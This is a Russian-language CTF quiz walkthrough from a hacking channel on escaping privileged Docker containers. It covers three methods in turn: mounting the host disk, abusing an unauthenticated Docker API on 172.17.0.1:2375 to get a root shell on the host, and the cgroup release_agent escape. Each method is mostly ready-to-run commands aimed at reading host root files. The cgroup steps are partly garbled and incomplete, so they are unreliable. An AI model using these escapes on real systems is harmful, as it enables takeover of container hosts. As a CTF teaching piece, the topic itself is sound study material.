🔓 Разбор задачи

Правильный ответ: ВСЕ ТРИ работают, но с нюансами!

➡️ Mount host disk

Почему работает:

Флаг --privileged отключает изоляцию устройств. Контейнер видит все диски хоста.

Эксплойт:

Шаг 1: Смотрим доступные диски
fdisk -l

Видим /dev/sda1 (корень хоста)

Шаг 2: Монтируем
mkdir /mnt/host
mount /dev/sda1 /mnt/host

Шаг 3: Профит!
cat /mnt/host/root/flag.txt

🟢 Плюсы: элементарно, 3 команды
🔴 Минусы: оставляет следы в логах монтирования

➡️ Docker API abuse

Почему работает:
Если DOCKER_HOST открыт без TLS, можем создавать контейнеры от имени хоста.

Эксплойт:

Проверяем доступ к API
curl https://172.17.0.1:2375/version

Запускаем новый контейнер с volume хоста
docker -H tcp://172.17.0.1:2375 run -v /:/host \
  -it alpine chroot /host sh

Теперь мы root на хосте!
cat /root/flag.txt

🟢 Плюсы: полный root-доступ, можем делать всё

🔴 Минусы: нужен Docker CLI в контейнере (не всегда есть)

➡️ Cgroup escape (КЛАССИКА)

Почему работает:
Privileged-контейнер может писать в cgroup notify_on_release и выполнить код на хосте.

Эксплойт:

Создаём cgroup
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
cd /tmp/cgrp

Включаем notify_on_release
echo 1 > cgroup.procs
echo 1 > notify_on_release

Пишем скрипт, который выполнится на хосте
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > release_agent

Создаём команду
cat /root/flag.txt > /output

🟢 Плюсы: работает даже без явных устройств
🔴 Минусы: сложнее, требует понимания cgroups

💬 Какой способ использовали бы вы?

🐸 Библиотека хакера

#ctf_challenge